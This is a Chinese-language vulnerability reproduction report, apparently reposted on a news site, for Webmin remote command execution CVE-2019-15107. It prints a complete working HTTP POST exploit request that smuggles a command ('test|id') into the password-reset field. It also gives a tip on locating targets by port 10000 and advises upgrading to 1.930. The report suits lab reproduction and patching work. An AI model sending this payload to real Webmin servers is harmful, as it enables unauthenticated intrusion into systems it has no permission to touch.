当前位置: 首页 > news >正文

Webmin远程命令执行漏洞复现报告

漏洞编号

CVE-2019-15107

漏洞描述

Webmin是一个基于Web的系统配置工具,用于类Unix系统。密码重置页面中存在此漏洞,允许未经身份验证的用户通过简单的 POST 请求执行任意命令。

影响版本

Webmin<=1.920

漏洞评级

严重

利用方法(利用案例)

参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/

构造payload

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

直接利用payload即可 

漏洞挖掘

可以根据网站指纹信息

10000是这个系统的默认端口,在目标网站访问这个url:/password_change.cgi

加固建议

升级到1.930版本

漏洞分类

远程代码执行漏洞

参考链接

Vulhub - 用于漏洞环境的 Docker-Compose 文件

 

http://www.lryc.cn/news/190593.html

相关文章:

  • webstorm自定义文件模板(Vue + Scss)
  • 楔子-写在之前
  • 第 5 章 数组和广义表(稀疏矩阵的三元组顺序表存储实现)
  • 【RabbitMQ 实战】11 队列的结构和惰性队列
  • Python3-批量重命名指定目录中的一组文件,更改其扩展名
  • 渗透测试KAILI系统的安装环境(第八课)
  • 如何正确方便的理解双指针?力扣102 (二叉树的层序遍历)
  • Vue或uniapp引入自定义字体
  • ​力扣:LCR 122. 路径加密​ 题目:剑指Offer 05.替换空格(c++)
  • cJson堆内存释放问题
  • 论文阅读/写作扫盲
  • 一文拿捏对象内存布局及JMM(JAVA内存模型)
  • Android组件通信——ActivityGroup(二十五)
  • js的继承的方式
  • 聊聊HttpClient的重试机制
  • 北邮22级信通院数电:Verilog-FPGA(4)第三周实验:按键消抖、呼吸灯、流水灯 操作流程注意事项
  • Ghidra101再入门(上?)-Ghidra架构介绍
  • Vue3路由引入报错解决:无法找到模块“xxx.vue”的声明文件 xxx隐式拥有 “any“ 类型。
  • 基于若依ruoyi-nbcio支持flowable流程分类里增加流程应用类型
  • JS之同步异步promise、async、await
  • 【OpenCV • c++】自定义直方图 | 灰度直方图均衡 | 彩色直方图均衡
  • el-tree目录和el-table实现搜索定位高亮方法
  • linux常用指令
  • C语言,指针的一些运算
  • iPhone 如何强制重启
  • 数据结构--单链表操作
  • AlmaLinux (兼容centos)安装Geant4与ROOT
  • FPGA面试题(2)
  • 【C++ Primer Plus学习记录】指针——使用new来创建动态数组
  • 移动app广告变现,对接广告联盟还是选择第三方聚合广告平台?